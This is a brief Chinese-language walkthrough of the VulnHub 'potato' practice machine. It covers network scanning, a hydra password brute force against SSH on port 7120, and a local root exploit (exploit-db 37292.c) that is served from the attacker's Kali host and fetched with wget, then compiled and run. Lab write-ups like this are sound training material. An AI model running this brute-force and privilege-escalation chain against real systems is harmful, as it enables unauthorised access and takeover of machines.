vulnhub potato靶机
搭建靶机
扫描靶机IP
arp-scan -l
靶机IP:192.168.47.139
信息收集
nmap -A -p- 192.168.47.139
dirb http://192.168.47.139/
一个土豆子一个phpinfo
ssh开在7120端口
漏洞探测
打开什么都是土豆;用户名就用potato;利用九头蛇爆破一下密码
爆破出来了
hydra -l potato -P /home/zss/Desktop/zi.txt -vV -t 16 ssh://192.168.47.139:7120
账号:potato
密码:letmein
连接试试
ssh potato@192.168.47.139 -p 7120
Ok成功登录
查询一下ubuntu的版本;然后去kali查询一下他的漏洞
版本是:ubuntu 14.04
利用searchploit 查看一下版本漏洞
searchploit ubuntu 14.04
漏洞利用
将这个目录复制到当前
cp /usr/share/exploitdb/exploits/linux/local/37292.c .
kali开启对外服务
python3 -m http.server 80
靶机下载一下来
wget http://192.168.47.130/37292.c
将37292.c 编译为可执行文件
gcc 37292.c -o exp
执行exp就可以获取root权限
获取flag